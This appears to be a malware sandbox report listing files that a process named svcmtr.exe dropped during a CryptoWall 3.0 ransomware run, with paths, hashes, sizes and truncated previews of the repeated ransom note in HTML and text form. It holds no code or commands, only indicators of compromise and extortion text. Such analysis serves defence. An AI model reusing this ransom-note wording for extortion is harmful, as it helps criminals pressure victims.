                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Bibliography\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\CONVERT\1033\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\CONVERT\1033\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\CONVERT\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\CONVERT\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Document Parts\1033\14\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Document Parts\1033\14\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Document Parts\1033\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Document Parts\1033\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Document Parts\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Document Parts\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\FORMS\1033\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\FORMS\1033\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\FORMS\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\FORMS\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\Library\Analysis\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
